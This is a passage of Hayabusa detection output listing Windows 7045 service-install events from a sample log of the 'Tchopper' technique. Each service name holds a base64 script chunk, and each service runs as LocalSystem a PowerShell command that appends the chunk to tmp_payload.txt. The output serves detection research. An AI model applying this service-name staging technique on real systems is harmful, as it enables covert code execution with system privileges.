T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:08.709 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:14.610 